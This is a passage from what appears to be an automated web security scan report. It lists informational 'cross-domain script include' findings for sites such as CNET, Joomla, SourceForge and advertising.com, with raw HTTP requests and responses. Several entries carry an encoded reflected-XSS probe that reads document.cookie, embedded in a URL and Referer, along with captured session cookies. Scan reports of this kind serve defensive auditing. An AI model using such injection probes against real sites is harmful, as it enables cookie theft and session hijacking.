Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:25:29 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Tue, 25 Jan 2011 14:26:59 GMT
Age: 30
Content-Type: text/html; charset=UTF-8
Set-Cookie: tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
Set-Cookie: arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Thu, 24-Feb-2011 14:25:29 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=120
Keep-Alive: timeout=15, max=932
Connection: Keep-Alive
Content-Length: 84113

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title>Technolog
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/news/newFrontDoor.css"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.r2d2.compressed.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
</li>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/special/special.riverTwitterAd.compressed.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...
 <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cry3Q6LBqr37zJadbi-bnq"></script>
...[SNIP]...

21.309. http://nget.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nget.sourceforge.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: nget.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:46:09 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 06 Apr 2006 02:34:34 GMT
ETag: "11cd-410b9fb108280"
Accept-Ranges: bytes
Content-Length: 4557
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:46:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>nget @ sourceforge</title>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-
...[SNIP]...
</a>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.310. http://openports.se/news/aub/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://openports.se
Path:	/news/aub/x22

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/aub/x22 HTTP/1.1
Host: openports.se
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>OpenP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.311. http://pan.rebelbase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pan.rebelbase.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: pan.rebelbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 06 Aug 2010 04:10:25 GMT
ETag: "11711dc-6b23-d8a46e40"
Accept-Ranges: bytes
Content-Length: 27427
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Pan - A GTK+ Newsreader</title>
<link rel="stylesheet" type="text/css" href="/default.css" />
</head>
<body style=
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.312. http://people.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21.313. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The response dynamically includes the following script from another domain:

http://lh3.ggpht.com/s/v/70.22/script/lh_searchview.js

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.314. http://powersportsnetwork.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://powersportsnetwork.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: powersportsnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Content-Length: 39242
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Cache-control: Private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Motorcycle and ATV reviews, specifications, prices, used motorcycles by PowerSports Network</TITLE><META name="desc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 21:08:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:08:40 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 21:08:40 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzqEXE!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df724,5208681003,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5208681003?

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e56,8624420504,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=8624420504?

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 03:07:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Set-Cookie: C2=W5jPNJpwIg02F4FCdbdBehgohXgXwOoAM/oRBK7YDwAoGj6r1VQcKasjGKGBI9YRIP53FkL3F+4gPbw6TV4ssu2B/0mBBea7IIaWG4F; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: F1=BYlP+0kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHZpA!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzq1oH!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:02 GMT; path=/
Set-Cookie: 49004778=_4d3e3e56,8624420504,772178^924994^87^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 25 Jan 2011 03:07:02 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e56,8624420504,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=8624420504?">');document.write('<\/SCRIPT>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df728,7545040742,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=7545040742?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

21.320. http://resources.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.321. http://resources.joomla.org/directory/advsearch.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/advsearch.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.322. http://resources.joomla.org/directory/new.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/directory/new.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.323. http://resources.joomla.org/how-to-add-listings.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.joomla.org
Path:	/how-to-add-listings.html

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.324. http://sabnzbd.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sabnzbd.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js

Request

GET / HTTP/1.1
Host: sabnzbd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Mon, 24 Jan 2011 15:27:32 GMT
ETag: "6a00a-1d51-49a993d106100"
Accept-Ranges: bytes
Content-Length: 7505
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 16:07:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

